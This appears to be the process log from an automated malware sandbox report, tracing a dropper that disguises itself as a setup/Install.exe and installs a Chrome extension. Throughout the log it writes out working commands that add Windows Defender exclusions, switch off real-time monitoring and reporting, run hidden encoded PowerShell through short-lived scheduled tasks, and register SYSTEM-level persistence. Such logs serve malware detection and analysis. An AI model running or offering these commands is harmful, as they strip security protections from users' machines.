PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 2712 wrote to memory of 2728	2712	cmd.exe	37
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 3000 wrote to memory of 1944	3000	cmd.exe	39
PID 2712 wrote to memory of 2388	2712	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Users\Admin\AppData\Local\Temp\7zS6D34.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2800
- - C:\Users\Admin\AppData\Local\Temp\7zS786B.tmp\Install.exe
    .\Install.exe /S /site_id "385117"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3000
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:2720
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1944
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2712
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:2728
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:2388
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gyWEkCVOb" /SC once /ST 10:22:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2392
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gyWEkCVOb"
      4⤵
      PID:2404
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gyWEkCVOb"
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bRrLmincsdUQgplWAx" /SC once /ST 11:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV\fLqJTOocapOiuaw\RtAHwAp.exe\" 9p /site_id 385117 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1816

C:\Windows\system32\taskeng.exe
taskeng.exe {F40C37CF-17C3-45D2-A3D9-F280E2851748} S-1-5-21-2969888527-3102471180-2307688834-1000:YKQDESCX\Admin:Interactive:[1]
1⤵
PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:320
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2252

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2192

C:\Windows\system32\taskeng.exe
taskeng.exe {6B114946-AB93-488D-815A-2514A0150860} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2892
- C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV\fLqJTOocapOiuaw\RtAHwAp.exe
  C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV\fLqJTOocapOiuaw\RtAHwAp.exe 9p /site_id 385117 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:2364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gefwYMomv" /SC once /ST 05:31:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1116
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gefwYMomv"
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gefwYMomv"
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2008
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gtYtaXrTu" /SC once /ST 04:44:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:968
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gtYtaXrTu"
    3⤵
    PID:980
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gtYtaXrTu"
    3⤵
    PID:388
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2896
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\KJfFrQOSboyPfmaF\ZKXsDISL\akpvlSvLeWhWwTAo.wsf"
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\KJfFrQOSboyPfmaF\ZKXsDISL\akpvlSvLeWhWwTAo.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2528
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADdeFhyguSUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2812
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADdeFhyguSUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2400
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFoDPUdvU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFoDPUdvU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2720
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fOxnEmfbvtyaC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2728
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fOxnEmfbvtyaC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2876
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\frElYRIoNdjEJnGOQGR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\frElYRIoNdjEJnGOQGR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYpfbkoKIxTU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2184
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYpfbkoKIxTU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:744
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\IIVGwqYHKRWxGfVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:3032
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\IIVGwqYHKRWxGfVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2884
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2028
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1688
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADdeFhyguSUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADdeFhyguSUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFoDPUdvU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XFoDPUdvU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fOxnEmfbvtyaC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fOxnEmfbvtyaC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\frElYRIoNdjEJnGOQGR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2024
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\frElYRIoNdjEJnGOQGR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYpfbkoKIxTU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zYpfbkoKIxTU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\IIVGwqYHKRWxGfVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2440
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\IIVGwqYHKRWxGfVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:564
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:432
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1956
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jkWHEXGDLsVYUfOQV" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1180
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1820
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KJfFrQOSboyPfmaF" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gcpWmVmfh" /SC once /ST 08:53:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2176
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gcpWmVmfh"
    3⤵
    PID:868
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gcpWmVmfh"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:2492
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      PID:2896
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "DIGMaOalKgfyEtfbb" /SC once /ST 10:32:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\KJfFrQOSboyPfmaF\SmJeOHKRTBJYUSz\wowjNFV.exe\" oq /site_id 385117 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "DIGMaOalKgfyEtfbb"
    3⤵
    PID:2836
- C:\Windows\Temp\KJfFrQOSboyPfmaF\SmJeOHKRTBJYUSz\wowjNFV.exe
  C:\Windows\Temp\KJfFrQOSboyPfmaF\SmJeOHKRTBJYUSz\wowjNFV.exe oq /site_id 385117 /S
  2⤵
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2944
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bRrLmincsdUQgplWAx"
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:2732
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      PID:3000
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:2376
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:2876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XFoDPUdvU\BmiltQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZvkNugpROavukWn" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:2880
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ZvkNugpROavukWn2" /F /xml "C:\Program Files (x86)\XFoDPUdvU\ILHIBsp.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:988
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ZvkNugpROavukWn"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZvkNugpROavukWn"
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "yNgsvFevWjSuen" /F /xml "C:\Program Files (x86)\zYpfbkoKIxTU2\XXvSBXP.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
